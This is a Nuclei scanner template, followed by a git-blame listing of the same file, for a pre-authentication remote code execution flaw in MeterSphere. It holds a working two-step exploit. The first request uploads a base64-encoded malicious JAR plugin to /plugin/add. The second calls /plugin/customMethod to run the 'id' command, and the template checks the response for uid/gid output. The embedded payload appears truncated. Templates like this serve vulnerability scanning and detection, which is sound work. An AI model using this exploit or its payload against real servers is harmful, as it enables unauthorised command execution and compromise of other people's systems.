nuclei-templates/vulnerabilities/metersphere/metersphere-plugin-rce.yaml

id: metersphere-plugin-rce

info:
  name: MeterSphere - Remote Code Execution
  author: pdteam,y4er,pdresearch,rootxharsh,iamnoooob
  severity: critical
  description: |
    MeterSphere is susceptible to remote code execution.
  reference:
    - https://y4er.com/post/metersphere-plugincontroller-pre-auth-rce/
    - https://github.com/metersphere/metersphere
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cwe-id: CWE-77
  metadata:
    verified: true
  tags: metersphere,rce,intrusive

requests:
  - raw:
      - |
        POST /plugin/add HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/plain, */*
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryreButJNjkCniQExX

        ------WebKitFormBoundaryreButJNjkCniQExX
        Content-Disposition: form-data; name="file"; filename="metersphere-plugin-DebugSampler-1.0.1-jar-with-all-dependencies.jar"
        Content-Type: application/octet-stream

        {{base64_decode("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
        ------WebKitFormBoundaryreButJNjkCniQExX
        Content-Disposition: form-data; name="request"; filename="blob"
        Content-Type: application/json

        null
        ------WebKitFormBoundaryreButJNjkCniQExX--

      - |
        POST /plugin/customMethod HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Content-Type: application/json

        {"entry":"io.metersphere.plugin.DebugSampler.UiScriptApiImpl","request":"id"}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"data":'
          - '"success":true'
        condition: and

      - type: regex
        regex:
          - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        regex:
          - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"

# Enhanced by mp on 2022/05/26
Added MeterSphere Plugin Pre-auth RCE (#3543) 2022-01-15 21:36:09 +00:00			`id: metersphere-plugin-rce`

			`info:`
Enhancement: vulnerabilities/metersphere/metersphere-plugin-rce.yaml by mp 2022-05-26 19:23:19 +00:00			`name: MeterSphere - Remote Code Execution`
Fixing metersphere-plugin-rce template (#6758) * Fixing metersphere-plugin-rce template * Update metersphere-plugin-rce.yaml * Fixed the filename in Content-Disposition header --------- Co-authored-by: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> 2023-02-19 12:23:06 +00:00			`author: pdteam,y4er,pdresearch,rootxharsh,iamnoooob`
Added MeterSphere Plugin Pre-auth RCE (#3543) 2022-01-15 21:36:09 +00:00			`severity: critical`
Update metersphere-plugin-rce.yaml 2022-05-31 09:03:16 +00:00			`description: \|`
			`MeterSphere is susceptible to remote code execution.`
Added MeterSphere Plugin Pre-auth RCE (#3543) 2022-01-15 21:36:09 +00:00			`reference:`
			`- https://y4er.com/post/metersphere-plugincontroller-pre-auth-rce/`
			`- https://github.com/metersphere/metersphere`
Enhancement: vulnerabilities/metersphere/metersphere-plugin-rce.yaml by mp 2022-05-26 19:23:19 +00:00			`classification:`
			`cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H`
			`cvss-score: 10.0`
			`cwe-id: CWE-77`
Fixing metersphere-plugin-rce template (#6758) * Fixing metersphere-plugin-rce template * Update metersphere-plugin-rce.yaml * Fixed the filename in Content-Disposition header --------- Co-authored-by: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> 2023-02-19 12:23:06 +00:00			`metadata:`
			`verified: true`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`tags: metersphere,rce,intrusive`
Added MeterSphere Plugin Pre-auth RCE (#3543) 2022-01-15 21:36:09 +00:00
			`requests:`
			`- raw:`
Added missing request 2022-01-18 05:16:50 +00:00			`- \|`
			`POST /plugin/add HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept: application/json, text/plain, /`
			`Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryreButJNjkCniQExX`

			`------WebKitFormBoundaryreButJNjkCniQExX`
Fixing metersphere-plugin-rce template (#6758) * Fixing metersphere-plugin-rce template * Update metersphere-plugin-rce.yaml * Fixed the filename in Content-Disposition header --------- Co-authored-by: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> 2023-02-19 12:23:06 +00:00			`Content-Disposition: form-data; name="file"; filename="metersphere-plugin-DebugSampler-1.0.1-jar-with-all-dependencies.jar"`
Added missing request 2022-01-18 05:16:50 +00:00			`Content-Type: application/octet-stream`

Fixing metersphere-plugin-rce template (#6758) * Fixing metersphere-plugin-rce template * Update metersphere-plugin-rce.yaml * Fixed the filename in Content-Disposition header --------- Co-authored-by: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> 2023-02-19 12:23:06 +00:00			{{base64_decode("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
Added missing request 2022-01-18 05:16:50 +00:00			`------WebKitFormBoundaryreButJNjkCniQExX`
			`Content-Disposition: form-data; name="request"; filename="blob"`
			`Content-Type: application/json`

			`null`
			`------WebKitFormBoundaryreButJNjkCniQExX--`

Added MeterSphere Plugin Pre-auth RCE (#3543) 2022-01-15 21:36:09 +00:00			`- \|`
			`POST /plugin/customMethod HTTP/1.1`
			`Host: {{Hostname}}`
			`Origin: {{BaseURL}}`
			`Content-Type: application/json`

Fixing metersphere-plugin-rce template (#6758) * Fixing metersphere-plugin-rce template * Update metersphere-plugin-rce.yaml * Fixed the filename in Content-Disposition header --------- Co-authored-by: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> 2023-02-19 12:23:06 +00:00			`{"entry":"io.metersphere.plugin.DebugSampler.UiScriptApiImpl","request":"id"}`
Added MeterSphere Plugin Pre-auth RCE (#3543) 2022-01-15 21:36:09 +00:00
			`matchers-condition: and`
			`matchers:`
			`- type: word`
Update metersphere-plugin-rce.yaml 2022-05-31 09:03:16 +00:00			`part: body`
Added MeterSphere Plugin Pre-auth RCE (#3543) 2022-01-15 21:36:09 +00:00			`words:`
			`- '"data":'`
			`- '"success":true'`
			`condition: and`

			`- type: regex`
			`regex:`
			`- "((u\|g)id\|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"`

			`- type: status`
			`status:`
			`- 200`

			`extractors:`
			`- type: regex`
			`regex:`
Enhancement: vulnerabilities/metersphere/metersphere-plugin-rce.yaml by mp 2022-05-26 19:23:19 +00:00			`- "((u\|g)id\|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"`

			`# Enhanced by mp on 2022/05/26`